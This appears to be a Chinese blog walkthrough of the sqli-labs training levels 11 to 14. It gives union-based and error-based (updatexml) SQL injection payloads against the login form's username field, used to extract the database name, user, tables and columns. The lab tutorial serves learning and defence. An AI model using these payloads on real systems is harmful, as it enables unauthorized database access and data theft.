sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入

超栈2024-06-10 19:09
复制代码 
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

复制代码 
SQLI DUMB SERIES-11

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:

同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

python 复制代码 
uname=admin' -- &passwd=1

实施注入

获取数前数据库的数据名和用户名

sql 复制代码 
uname=0' union select database(),user() from dual -- &passwd=1

获取当前数据库的表名:

sql 复制代码 
uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

获取user表的列名:

python 复制代码 
uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

Less 12

复制代码 
SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")

同样通过这一个点获取数据库名和用户名。

python 复制代码 
uname=0") union select database(),user() from dual -- &passwd=1

Less 13

复制代码 
SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

sql 复制代码 
uname=0'&passwd=1

正常输入结果显示成功,不过没有任何提示内容。

sql 复制代码 
uname=admin') -- &passwd=1

如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

sql 复制代码 
uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

实施注入

sql 复制代码 
uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

获取当前数据库所有的表名

sql 复制代码 
uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

获取user表所有的列名

sql 复制代码 
uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

到此注入成功

Less 14

复制代码 
SQLI DUMB SERIES-14

判断注入点

测试双引号报错。

sql 复制代码 
uname=admin "&passwd=1

然后经测试采用双引号加注释符就可以验证登录成功。

sql 复制代码 
uname=admin "-- &passwd=1

但这样还不能获取数据,则判断这个注入方式为错误注入。

通过updatexml方法即可成功注入

sql 复制代码 
uname=admin " and updatexml(1,user(),3)-- &passwd=1

实施注入

获取数据库名

sql 复制代码 
uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

获取当前数据库所有的表名

sql 复制代码 
uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

获取user表所有的列名

sql 复制代码 
uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

系列文章

相关推荐
IT_陈寒1 天前
SpringBoot实战:5个让你的API性能翻倍的隐藏技巧
前端·人工智能·后端
iceiceiceice1 天前
iOS PDF阅读器段评实现:如何从 PDFSelection 精准还原一个自然段
前端·人工智能·ios
大金乄1 天前
封装一个vue2的elementUI 表格组件(包含表格编辑以及多级表头)
前端·javascript
爱可生开源社区1 天前
MiniMax M2.5 的 SQL 能力令人惊艳!
sql·llm
葡萄城技术团队1 天前
【性能优化篇】面对万行数据也不卡顿?揭秘协同服务器的“片段机制 (Fragments)”
前端
叶落阁主1 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
程序员阿峰1 天前
2026前端必备:TensorFlow.js,浏览器里的AI引擎,不写Python也能玩转智能
前端
Jans1 天前
Shipfe — Rust 写的前端静态部署工具:一条命令上线 + 零停机 + 可回滚 + 自动清理
前端
徐小夕1 天前
JitWord 2.3: 墨定,行远
前端·vue.js·github
南果梨1 天前
OpenClaw 完整教程!从安装到使用(官方脚本版)
前端·git·开源
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04本地部署 OpenClaw + DeepSeek-R1 完全指南05OpenClaw优化飞书API 额度已耗尽问题06Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services07Window 10部署openclaw报错node.exe : npm error code 12808小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10OpenClaw大龙虾机器人完整安装教程